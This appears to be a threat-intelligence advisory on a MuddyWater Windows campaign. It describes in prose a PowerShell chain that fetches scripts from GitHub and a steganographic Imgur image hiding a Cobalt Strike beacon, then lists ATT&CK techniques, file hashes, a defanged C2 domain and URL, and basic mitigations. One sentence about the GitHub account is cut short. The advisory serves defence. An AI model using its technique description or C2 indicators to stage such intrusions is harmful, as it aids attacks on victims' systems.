Advisory |
Malware Intelligence |
Potential Threat Actors |
MuddyWater |
Targeted Platform |
Windows |
Malware Execution
When the malware is executed in the infected environment, it launches a Powershell script which further downloads a second Powershell script which is hosted on Github. The Powershell script then downloads an image [PNG] from the image hosting platform Imgur.com, which hides an encoded Cobalt Strike payload in its pixels. After downloading the image the Powershell script decodes the payload which inturn enables the Cobalt Strike beacon to connect to the attackers’ infrastructure. Cobalt Strike masquerades as eicar, an anti-malware test file, to connect to the C2 server. The account that holds the Powershell script on Github.
Tactics, Techniques, and Procedures
Tactics |
Techniques |
|
| Initial Access | T1566.001 | Phishing: Spear Phishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| T1027.003 | Obfuscated Files or Information: Steganography | |
| Command and Control | T1001.002 | Data Obfuscation: Steganography |
Indicators of Compromise
- d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
- Ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866
- Domain:Port : Mazzion1234-44451[.]portmap[.]host:44451
- Url: hxxp://Mazzion1234-44451.portmap.host/fVRO
Impact
Technical Impact:
- The malware is responsible of downloading Cobalt Strike malware
- The malware can lead to further attacks on the victims
Business Impact:
- Privacy violation
- Victims are exposed to other attacks
Mitigation
- Be careful with any attachment delivered by emails
- Stay updated with latest patching
- Apply effective application control policies